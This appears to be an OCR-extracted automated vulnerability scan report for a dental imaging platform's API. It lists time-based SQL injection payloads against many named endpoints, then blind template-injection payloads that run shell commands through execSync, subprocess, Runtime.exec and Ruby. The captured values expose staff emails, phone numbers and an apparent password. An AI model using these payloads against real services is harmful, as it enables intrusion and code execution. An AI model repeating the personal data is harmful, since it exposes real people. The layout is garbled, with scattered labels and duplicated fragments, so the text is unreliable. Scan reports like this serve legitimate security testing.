The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,634] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,695] milliseconds, when the original unmodified query with value [22-49-76-AF-7C-FD-03] took [1,566] milliseconds.

URL

https://api.velmeni.ai/api/sikka/create_patient_webhook

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,845] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,512] milliseconds, when the original unmodified query with value [] took

[694] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,845] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,512] milliseconds, when the original unmodified query with value [] took

[694] milliseconds.

URL

https://api.velmeni.ai/api/sikka/create_patient_webhook

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,223] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,259] milliseconds, when the original unmodified query with value [CA] took

[1,224] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,223] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,259] milliseconds, when the original unmodified query with value [CA] took

[1,224] milliseconds.

URL

https://api.velmeni.ai/api/sikka/import practice data/3? practice ids=3&source system=VELMENI FOR DENTIST

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [914] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,021] milliseconds, when the original unmodified query with value

[VELMENI FOR DENTIST] took [767] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [914] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,021] milliseconds, when the original unmodified query with value

[VELMENI FOR DENTIST] took [767] milliseconds.

URL

https://api.velmeni.ai/api/sikka/import_procedure_category?

source system=VELMENI FOR DENTIST

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [881] milliseconds, parameter

Evidence

value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,551] milliseconds, when the original unmodified query with value [4] took [804] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [881] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,551] milliseconds, when the original unmodified query with value [4] took [804] milliseconds.

URL

https://api.velmeni.ai/api/user/add

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,257] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,369] milliseconds, when the original unmodified query with

value [Anil K] took [269] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,257] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,369] milliseconds, when the original unmodified query with value [Anil K] took [269] milliseconds.

URL

https://api.velmeni.ai/api/user/change_password

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [609] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [630] milliseconds, when the original unmodified query with value [Velmeni! 2023] took [2,345] milliseconds.

Other

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [609] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [630] milliseconds, when the original unmodified query with value [Velmeni! 2023] took [2,345] milliseconds.

Info

URL

https://api.velmeni.ai/api/user/enable_user

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [259] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,050] milliseconds, when the original unmodified query with value [VELMENI FOR DENTIST] took [1,761] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [259] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,050] milliseconds, when the original unmodified query with value [VELMENI FOR DENTIST] took [1,761] milliseconds.

URL

https://api.velmeni.ai/api/user/initiate forgot password

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [778] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [808] milliseconds, when the original unmodified query with value [theertha+1@velmeni.com] took [1,815] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [778] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [808] milliseconds, when the original unmodified query with value [theertha+1@velmeni.com] took [1,815] milliseconds.

URL https://api.velmeni.ai/api/user/validate_email

Method POST

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,333] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,529] milliseconds, when the original unmodified query with value

[sachin@velmeni.com] took [1,240] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,333] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,529] milliseconds, when the original unmodified query with value

[sachin@velmeni.com] took [1,240] milliseconds.

URL https://api.velmeni.ai/api/velmeni_bridge/add_image

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,403] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,920] milliseconds, when the original unmodified guery with value [bitewing]

took [1,155] milliseconds.

The guery time is controllable us

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,403] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,920] milliseconds, when the original unmodified query with value [bitewing]

took [1,155] milliseconds.

URL https://api.velmeni.ai/api/velmeni_bridge/add_image

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [962] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,093] milliseconds, when the original unmodified query with value [xray]

took [1,793] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [962] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,093] milliseconds, when the original unmodified query with value [xray]

took [1,793] milliseconds.

URL https://api.velmeni.ai/api/velmeni_bridge/add_image

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,175] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,435] milliseconds, when the original unmodified query with

value [v7uHyecyUfPM4wJMGzsj/Q==] took [831] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,175] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

Info caused the request to take [3,435] milliseconds, when the original unmodified query with

value [v7uHyecyUfPM4wJMGzsj/Q==] took [831] milliseconds.

URL https://api.velmeni.ai/api/velmeni_bridge/add_image

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [523] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,042] milliseconds, when the original unmodified query with value [D111]

took [1,510] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [523] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,042] milliseconds, when the original unmodified query with value [D111]

took [1,510] milliseconds.

URL https://api.velmeni.ai/api/velmeni_bridge/add_image

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [655] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,440] milliseconds, when the original unmodified query with value

[vbuwkpmniqsklahyrtxcz] took [2,073] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [655] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,440] milliseconds, when the original unmodified guery with value

[vbuwkpmnigsklahyrtxcz] took [2,073] milliseconds.

URL https://api.velmeni.ai/api/organizations/practice/update/1659

PUT Method

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [760] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [963] milliseconds, when the original unmodified query with value [Amit Vora

DDS] took [260] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [760] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [963] milliseconds, when the original unmodified query with value [Amit Vora

DDS] took [260] milliseconds.

URL https://api.velmeni.ai/api/organizations/practice/update/1659

PUT Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [255] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,939] milliseconds, when the original unmodified query with value [53] took

[766] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [255] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,939] milliseconds, when the original unmodified query with value [53] took

[766] milliseconds.

https://api.velmeni.ai/api/organizations/practice/update/1659

Evidence

Evidence

Other

Info

Other Info

Evidence

Other Info

Evidence

Other Info

URL

Method **PUT**

Attack case randomblob(100000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [702] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [748] milliseconds, when the original unmodified query with value

[7324942444] took [261] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [702] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [748] milliseconds, when the original unmodified query with value

[7324942444] took [261] milliseconds.

URL https://api.velmeni.ai/api/organizations/update/27

PUT Method

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,488] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,664] milliseconds, when the original unmodified query with

value [(912) 123-4568] took [256] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,488] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,664] milliseconds, when the original unmodified guery with

value [(912) 123-4568] took [256] milliseconds.

URL https://api.velmeni.ai/api/organizations/update/27

Method **PUT**

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,243] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,328] milliseconds, when the original unmodified query with value

[VELMENI_FOR_DENTIST] took [287] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,243] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,328] milliseconds, when the original unmodified query with value [VELMENI_FOR_DENTIST] took [287] milliseconds.

URL https://api.velmeni.ai/api/patient/update

Method **PUT**

Attack case randomblob(100000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [786] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,810] milliseconds, when the original unmodified query with value [1] took

[368] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [786] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,810] milliseconds, when the original unmodified query with value [1] took [368] milliseconds.

https://api.velmeni.ai/api/patient/update

Method **PUT**

Attack case randomblob(1000000) when not null then 1 else 1 end

Evidence

Evidence

Other

Info

Other

Info

Evidence

Other Info

Evidence

Other Info

URL

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [774] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [985] milliseconds, when the original unmodified query with value [145139] took [773] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [774] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [985] milliseconds, when the original unmodified query with value [145139] took [773] milliseconds.

URL

https://api.velmeni.ai/api/patient/update

Method PUT

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,892] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,293] milliseconds, when the original unmodified query with value [VELMENI FOR DENTIST] took [1,565] milliseconds.

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,892] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,293] milliseconds, when the original unmodified query with value [VELMENI FOR DENTIST] took [1,565] milliseconds.

URL

https://api.velmeni.ai/api/user/update/1

Method PUT

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [764] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,531] milliseconds, when the original unmodified query with value [sachin] took [1,018]

milliseconds.

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [764] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,531] milliseconds, when the original unmodified query with value [sachin] took [1,018] milliseconds.

URL https://api.velmeni.ai/api/user/update/1

Method PUT

Attack case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [252] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [822] milliseconds, when the original unmodified query with value [anand] took [250] milliseconds.

took [250] milliseco

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [252] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [822] milliseconds, when the original unmodified query with value [anand] took [250] milliseconds.

URL https://api.velmeni.ai/api/user/update/1

Method PUT

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,147] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the

	request to take [1,273] milliseconds, when the original unmodified query with value [1] took [1,021] milliseconds.
Other Info	The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,147] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,273] milliseconds, when the original unmodified query with value [1] took [1,021] milliseconds.
Instances	575
	Do not trust client side input, even if there is client side validation in place.
Solution	In general, type check all data on the server side.
	If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
	If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
	If database Stored Procedures can be used, use them.
	Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
	Do not create dynamic SQL queries using simple string concatenation.
	Escape all data received from the client.
	Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
	Apply the principle of least privilege by using the least privileged database user possible.
	In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
	Grant the minimum database access that is necessary for the application.
Reference	https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
CWE Id	8 <u>9</u>
WASC Id	19
Plugin Id	40024
High	Server Side Template Injection (Blind)

High	Server Side Template Injection (Blind)
Description	When the user input is inserted in the template instead of being used as argument in rendering is evaluated by the template engine. Depending on the template engine it can lead to remote code execution.
URL	https://api.velmeni.ai/api/patient/scan/add?source_system=VELMENI_FOR_DENTIST
Method	POST
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/patient/scan/save_doctor_feedback
Method	POST
Attack	<%= global.process.mainModule.require('child_process').execSync('sleep 4').toString()%>
Evidence	

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack

{""._class_.__mro_[1]._subclasses_()[157]._repr_.__globals_.get("_builtins_").get("_import_")("subprocess").check_output("sleep 5")}}

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack #{global.process.mainModule.require('child process').execSync('sleep 6').toString()}

Evidence Other Info

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack {system("sleep 5")}

Evidence Other

Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack #{global.process.mainModule.require('child_process').execSync('sleep 4').toString()}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack #{%x(sleep 3)}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack <%= global.process.mainModule.require('child process').execSync('sleep 3').toString()%>

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

execSync('sleep 3').toString()\")")()}}

Evidence

Other

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack \${_import_("subprocess").check_output("sleep 7", shell=True)}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack #set(\$engine="") #set(\$proc=\$engine.getClass().forName("java.lang.Runtime").

getRuntime().exec("sleep 3")) #set(\$null=\$proc.waitFor()) \${null}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack #set(\$engine="") #set(\$proc=\$engine.getClass().forName("java.lang.Runtime").

getRuntime().exec("sleep 6")) #set(\$null=\$proc.waitFor()) \${null}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack #{%x(sleep 4)}

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack #{%x(sleep 5)}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack #{%x(sleep 6)}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method POST

Attack #{%x(sleep 7)}

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack #{global.process.mainModule.require('child_process').execSync('sleep 3').toString()}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack #{global.process.mainModule.require('child_process').execSync('sleep 4').toString()}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack #{global.process.mainModule.require('child_process').execSync('sleep 5').toString()}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack \${_import_("subprocess").check_output("sleep 3", shell=True)}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack \${_import_("subprocess").check_output("sleep 4", shell=True)}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack \${_import_("subprocess").check_output("sleep 5", shell=True)}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack </

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack </

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack <%= global.process.mainModule.require('child_process').execSync('sleep 3').toString()%>

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

Attack <%= global.process.mainModule.require('child_process').execSync('sleep 4').toString()%>

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

Attack <%= global.process.mainModule.require('child_process').execSync('sleep 5').toString()%>

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack <%= global.process.mainModule.require('child process').execSync('sleep 6').toString()%>

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack <%=%x(sleep 3)%>

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack <%=%x(sleep 4)%>

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack <%=%x(sleep 5)%>

Evidence Other Info **URL** https://api.velmeni.ai/api/patient/scan/save_doctor_feedback POST Method Attack {system("sleep 4")} Evidence Other Info URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback Method POST Attack {system("sleep 5")} Evidence Other Info **URL** https://api.velmeni.ai/api/patient/scan/save_doctor_feedback Method **POST** Attack {system("sleep 6")} Evidence Other Info URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback Method **POST** Attack {{= global.process.mainModule.require('child_process').execSync('sleep 3').toString() }} Evidence Other Info URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback Method POST Attack {{= global.process.mainModule.require('child process').execSync('sleep 4').toString() }} Evidence Other Info **URL** https://api.velmeni.ai/api/patient/scan/save_doctor_feedback Method **POST** Attack {{= global.process.mainModule.require('child_process').execSync('sleep 7').toString() }} Evidence Other Info URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback Method POST Attack {{_import_("subprocess").check_output("sleep 3", shell=True)}} Evidence

Other Info URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack {{_import_("subprocess").check_output("sleep 4", shell=True)}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack {{_import_("subprocess").check output("sleep 5", shell=True)}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack {{_import_("subprocess").check output("sleep 6", shell=True)}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack {{range.constructor("return eval(\"global.process.mainModule.require('child_process').

execSync('sleep 4').toString()\")")()}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

execSync('sleep 6').toString()\")")()}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack #set(\$engine="") #set(\$proc=\$engine.getClass().forName("java.lang.Runtime").

getRuntime().exec("sleep 3")) #set(\$null=\$proc.waitFor()) \${null}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack #set(\$engine="") #set(\$proc=\$engine.getClass().forName("java.lang.Runtime").

getRuntime().exec("sleep 4")) #set(\$null=\$proc.waitFor()) \${null}

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack #{%x(sleep 5)}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack #{global.process.mainModule.require('child_process').execSync('sleep 4').toString()}

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack #{global.process.mainModule.require('child_process').execSync('sleep 5').toString()}

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

Attack #{global.process.mainModule.require('child_process').execSync('sleep 6').toString()}

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack \${_import_("subprocess").check_output("sleep 3", shell=True)}

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack \${_import_("subprocess").check_output("sleep 4", shell=True)}

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack \${_import_("subprocess").check_output("sleep 5", shell=True)}

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack </pr

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack </

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack </pr

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack <%= global.process.mainModule.require('child process').execSync('sleep 3').toString()%>

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack <%= global.process.mainModule.require('child_process').execSync('sleep 4').toString()%>

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack <%= global.process.mainModule.require('child_process').execSync('sleep 6').toString()%>

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack <%= global.process.mainModule.require('child_process').execSync('sleep 7').toString()%>

Evidence Other

URL

Info

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method POST

Attack <%=%x(sleep 3)%>

Other Info **URL** https://api.velmeni.ai/api/patient/scan/save_doctor_feedback Method **POST** <%=%x(sleep 4)%> Attack Evidence Other Info **URL** https://api.velmeni.ai/api/patient/scan/save_doctor_feedback POST Method Attack {system("sleep 3")} Evidence Other Info https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL **POST** Method {system("sleep 4")} Attack Evidence Other Info URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback Method **POST** Attack {system("sleep 5")} Evidence Other Info URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback Method POST Attack {system("sleep 6")} Evidence Other Info URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback POST Method {{""._class__. __mro_[1]._subclasses_()[157]._repr_ _globals_.get("_builtins_"). Attack get("_import_")("subprocess").check_output("sleep 6")}} Evidence Other Info **URL** https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **POST** Method {{= global.process.mainModule.require('child_process').execSync('sleep 4').toString() }} Attack Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack {{_import_("subprocess").check_output("sleep 3", shell=True)}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

Attack {{_import_("subprocess").check_output("sleep 4", shell=True)}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack {{_import_("subprocess").check output("sleep 5", shell=True)}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack {{_import_("subprocess").check_output("sleep 6", shell=True)}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack {{_import_("subprocess").check_output("sleep 7", shell=True)}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

execSync('sleep 3').toString()\")")()}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

execSync('sleep 4').toString()\")")()}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

execSync('sleep 5').toString()\")")()}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

execSync('sleep 7').toString()\")")()}}

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/scan/skip

Method POST

Attack <%= global.process.mainModule.require('child process').execSync('sleep 3').toString()%>

Evidence

Other Info

URL https://api.velmeni.ai/api/sikka/add_image

Method POST

Attack </pr

Evidence

Other Info

URL https://api.velmeni.ai/api/sikka/create_patient_webhook

Method POST

Attack {{= global.process.mainModule.require('child process').execSync('sleep 3').toString() }}

Evidence Other Info

URL https://api.velmeni.ai/api/sikka/create_patient_webhook

Method POST

